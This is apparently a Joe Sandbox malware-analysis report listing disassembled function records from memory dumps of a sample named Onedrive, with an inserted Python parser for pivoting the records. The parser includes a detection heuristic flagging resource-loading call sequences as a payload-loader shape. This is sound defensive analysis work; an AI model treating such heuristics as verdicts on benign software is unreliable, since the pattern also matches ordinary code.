                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                                                    • API String ID: 0-277556848
                                                    • Opcode ID: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
                                                    • Instruction ID: 4fa1b89bf4f50d954535e29cb820ad413c2038f6723c86397eaeaad90bae83fe
                                                    • Opcode Fuzzy Hash: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
                                                    • Instruction Fuzzy Hash: 10411F21B2CA4281E750E716E471BBAB361FF90754F811231F6BE5AAEEDF2CE5048740
                                                    Strings
                                                    • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FFDF3ADACE4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 0-3378279506
                                                    • Opcode ID: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
                                                    • Instruction ID: 9893f03fd3b41f55f9d4f2ae8873e5e90e417ca52570dac9745992b71952abd4
                                                    • Opcode Fuzzy Hash: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
                                                    • Instruction Fuzzy Hash: B7316F21A1CB8581DB609B16E06076EB7A0FB847A4F450232F6FE5A7DEDF2CD5018B40
                                                    Strings
                                                    • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FFDF3ADABA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 0-3378279506
                                                    • Opcode ID: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
                                                    • Instruction ID: 5cb16073718d9cfd03a8d5deda593427fcea470e81d014be8000c7587cfbe0a2
                                                    • Opcode Fuzzy Hash: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
                                                    • Instruction Fuzzy Hash: 51317E21A1CB8181EB20AB16E06076EB7A1FB857A4F511631F6FE6B7D9DF2CD5018B40
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
                                                    • Instruction ID: da044472d22c8fe12ce97d13169ea5160cb60b911c2c4883342080e2d2b7925f
                                                    • Opcode Fuzzy Hash: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
                                                    • Instruction Fuzzy Hash: C431D036619F8886DBA0CB1AF49071AB7A4F388B94F500225EBDD47BA8DF3CC554CB00
                                                    Strings
                                                    • minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp, xrefs: 00007FFDF3AE9202
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
                                                    • API String ID: 0-2685728405
                                                    • Opcode ID: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
                                                    • Instruction ID: a8387b97f33e58f176f6a3b800b07c4f46bd200d0e1a2ec4f2a7d7c20e6f7a5f
                                                    • Opcode Fuzzy Hash: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
                                                    • Instruction Fuzzy Hash: C4212D2272CA8181DB50DB16F45066AB3A4FB847A0F500335F6BE5ABEDDF3CD1508B00
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CharCompareNextString
                                                    • String ID: ParentWindowHandle
                                                    • API String ID: 42738925-3107191162
                                                    • Opcode ID: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
                                                    • Instruction ID: ec9bf9df7c1f352e251f8ad9a2377efa543a2ffec62dcd9414e543d60a5cd6a1
                                                    • Opcode Fuzzy Hash: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
                                                    • Instruction Fuzzy Hash: 0811D232B08B5182E6109B56E440069BBA4FBB4BE0F494231EAAD873A0CF3CE446C750
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _handle_error
                                                    • String ID: !
                                                    • API String ID: 1757819995-2657877971
                                                    • Opcode ID: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
                                                    • Instruction ID: 6b1900b39d72cd2c5fcb8bdc536d166cffb6e0d850e6859fadf9cd0419a2afbf
                                                    • Opcode Fuzzy Hash: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
                                                    • Instruction Fuzzy Hash: 1F212876A18BC586D360CF20E46475BB760FBDA394F505316E6C92AA59EFBCD0848F00
                                                    APIs
                                                      • Part of subcall function 00007FF63EA1BF50: FindResourceExW.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BF89
                                                      • Part of subcall function 00007FF63EA1BF50: LoadResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFA6
                                                      • Part of subcall function 00007FF63EA1BF50: LockResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFBA
                                                    • CoTaskMemAlloc.API-MS-WIN-CORE-COM-L1-1-0(?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C0DE
                                                    • memmove.MSVCRT(?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C0FF
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Resource$AllocFindLoadLockTaskmemmove
                                                    • String ID: ComplianceText
                                                    • API String ID: 2400272053-346262819
                                                    • Opcode ID: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
                                                    • Instruction ID: 4c5d82669d99c2e76f35e3c1533412bd1c17a158e45d6965879311054c992e62
                                                    • Opcode Fuzzy Hash: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
                                                    • Instruction Fuzzy Hash: 9301AD32704B4AC6E7008F52E4454AAB7A4FB68BD0B564135EF9C83311EF79D85AD740
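The function records on this page are emitted one per disassembled routine, and the only practical way to use a few thousand of them is to load them into a structure you can pivot on: group by module base to separate the OneDrive image at 00007FF63EA10000 from the CRT module at 00007FFDF3AD0000, join on API String ID against other reports, or search for an API call shape such as the FindResourceExW / LoadResource / LockResource / memmove sequence that reads the ComplianceText resource above. The parser below is an added example for this page, not a tool Joe Sandbox ships; the two sample records are copied from the report text above (with the "Download File" link text the HTML rendering fuses onto the Associated lines left in, because the parser strips it), and the dict field names and helper functions are my own.

```python
"""Parse Joe Sandbox function records (the text form of the report page) into
dicts that can be pivoted on API String ID, module base or API call shape."""
import re
from collections import defaultdict

# Two records excerpted from the report above: the ComplianceText resource
# reader in the module at 00007FF63EA10000 and a CRT routine in the module at
# 00007FFDF3AD0000. A record ends at its "Instruction Fuzzy Hash" line.
SAMPLE_RECORDS = r"""APIs
  • Part of subcall function 00007FF63EA1BF50: FindResourceExW.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BF89
  • Part of subcall function 00007FF63EA1BF50: LoadResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFA6
  • Part of subcall function 00007FF63EA1BF50: LockResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFBA
• CoTaskMemAlloc.API-MS-WIN-CORE-COM-L1-1-0(?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C0DE
• memmove.MSVCRT(?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C0FF
Strings
Memory Dump Source
• Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
• Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
Similarity
• API ID: Resource$AllocFindLoadLockTaskmemmove
• String ID: ComplianceText
• API String ID: 2400272053-346262819
• Opcode ID: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
• Instruction ID: 4c5d82669d99c2e76f35e3c1533412bd1c17a158e45d6965879311054c992e62
• Opcode Fuzzy Hash: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
• Instruction Fuzzy Hash: 9301AD32704B4AC6E7008F52E4454AAB7A4FB68BD0B564135EF9C83311EF79D85AD740
Strings
• D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 00007FFDF3AD42C7
Memory Dump Source
• Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
• Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
Similarity
• API ID:
• String ID: D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
• API String ID: 0-277556848
• Opcode ID: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
• Instruction ID: 4fa1b89bf4f50d954535e29cb820ad413c2038f6723c86397eaeaad90bae83fe
• Opcode Fuzzy Hash: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
• Instruction Fuzzy Hash: 10411F21B2CA4281E750E716E471BBAB361FF90754F811231F6BE5AAEEDF2CE5048740
"""

SECTION_HEADS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Part of subcall function X: Api.MODULE(args), ref: ADDR" or "Api.MODULE ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<fn>\w+)\.(?P<mod>[\w.-]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
HEX_OR_UNKNOWN = re.compile(r"\?|[0-9A-Fa-f]{8}|[0-9A-Fa-f]{16}")


def _new_record():
    return {"apis": [], "strings": [], "associated": [], "fields": {}}


def parse_records(text):
    """One dict per function. The final field Joe Sandbox prints for a record is
    'Instruction Fuzzy Hash', so that line closes the record; a trailing record
    cut off by a page boundary is kept if it collected any fields."""
    records, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADS:
            section = line
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = m["args"].split(",") if m["args"] else []
                rec["apis"].append({"fn": m["fn"], "module": m["mod"], "ref": m["ref"],
                                    "subcall_of": m["parent"], "args": args,
                                    # literal (non-pointer, non-unknown) arguments stand out for triage
                                    "literal_args": [a for a in args if not HEX_OR_UNKNOWN.fullmatch(a)]})
            continue
        if section == "Strings":
            value, xrefs = (item.rsplit(", xrefs: ", 1) + [""])[:2] if ", xrefs: " in item else (item, "")
            rec["strings"].append({"value": value, "xrefs": xrefs.split()})
            continue
        key, _, value = item.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Associated":
            # the HTML rendering fuses the download-link text onto the dump name
            rec["associated"].append(value.removesuffix("Download File").strip())
        elif key == "Source File":
            name, _, rest = value.partition(", Offset: ")
            base, _, pe = rest.partition(", based on PE: ")
            rec["fields"].update({"source_file": name, "module_base": base, "based_on_pe": pe == "true"})
        else:
            rec["fields"][key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(rec)
            rec, section = _new_record(), None
    if rec["fields"]:
        records.append(rec)
    return records


def calls(rec, *names):
    """True if the record (including subcalls the report attributes to it) reaches every API named."""
    seen = {a["fn"] for a in rec["apis"]}
    return all(n in seen for n in names)


def resource_readers(records):
    """String IDs of functions that locate, load, lock and then copy a PE resource:
    the shape of a payload-in-resource loader, and of the ComplianceText reader here."""
    return [r["fields"].get("String ID", "") for r in records
            if calls(r, "FindResourceExW", "LoadResource", "LockResource", "memmove")]


def by_module_base(records):
    """Opcode IDs grouped by the image base each function was dumped from."""
    groups = defaultdict(list)
    for r in records:
        groups[r["fields"].get("module_base", "")].append(r["fields"].get("Opcode ID"))
    return dict(groups)
```

To run it over a whole report, save the page as text and pass the file contents to parse_records; the Opcode ID is the stable key for deduplicating functions across reports, and API String ID is the cheap first pivot when comparing two samples.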
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECC0B
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                      • Part of subcall function 00007FFDF3AEA8F0: _CrtIsValidPointer.LIBCMTD ref: 00007FFDF3AEAA28
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECC1E
                                                      • Part of subcall function 00007FFDF3AF66B0: LeaveCriticalSection.KERNEL32 ref: 00007FFDF3AF66D1
                                                     Memory Dump Source
                                                     • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection__vcrt_lock$EnterLeavePointerValid
                                                    • String ID: Object dump complete.
                                                    • API String ID: 214106405-632625063
                                                    • Opcode ID: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
                                                    • Instruction ID: 8fdbbeaf2102e6cb8f448b5b1ef0ec981d68df511f2b33fbdca2f34d68b5d027
                                                    • Opcode Fuzzy Hash: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
                                                    • Instruction Fuzzy Hash: A2E0E531F1874241EB28BB72E472C6A3799AB80300F915435EA9D56AEEDE3DD4508700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
                                                    • Instruction ID: 2e66a8af4e8a437504550666042716cfb12a5b8269659c3873eb93d3fbccd256
                                                    • Opcode Fuzzy Hash: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
                                                    • Instruction Fuzzy Hash: A241E632F0865686EE14AF92544807DB692BFB4BC0B5A4438FE4E97791DF3CE40DA360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
                                                    • Instruction ID: 9a0f812b5855a26db8e29e89e1003412c52cb3a691ae0747412af8178f1bcb13
                                                    • Opcode Fuzzy Hash: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
                                                    • Instruction Fuzzy Hash: 8731F222B08B4687EA14BF91A44407DB692BFB8BD4F194434FA5E87391EF3CE44DA650
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF63EA1D792,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D22
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D36
                                                    • GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF63EA1D792,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D60
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA13D74
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
                                                    • Instruction ID: 77c9c5dc45931c951e120fee972c9c1d53ae7dd88bdce3414ba9de27ec8ba080
                                                    • Opcode Fuzzy Hash: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
                                                    • Instruction Fuzzy Hash: 9C211572605B80DAD704DF56E980129FBA0FB59F94B59C068EE4D93724CF38E8AAC700
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19425
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19439
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19460
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19474
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
                                                    • Instruction ID: 0a1fb919e2de2f0e704fa0258ca117a499025773872454f3144ec716d47ed561
                                                    • Opcode Fuzzy Hash: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
                                                    • Instruction Fuzzy Hash: E4113C32A05A81C6E7019FA2E540339BBA0FBA9F85F09C178DA0E57758CF38D44AD750
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
                                                    • Instruction ID: 2493acac8ffd9a9bfbbc56072b7a6baf202e9766cb7055b224edb8ffc8937dbc
                                                    • Opcode Fuzzy Hash: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
                                                    • Instruction Fuzzy Hash: 02014032A08B41CAE704AF56B4443A9BBA0FBA9B80F4D8174EE4D53719DF3CD459D750
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E226
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E23B
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E25B
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA1DE5C,?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1E270
                                                    Memory Dump Source
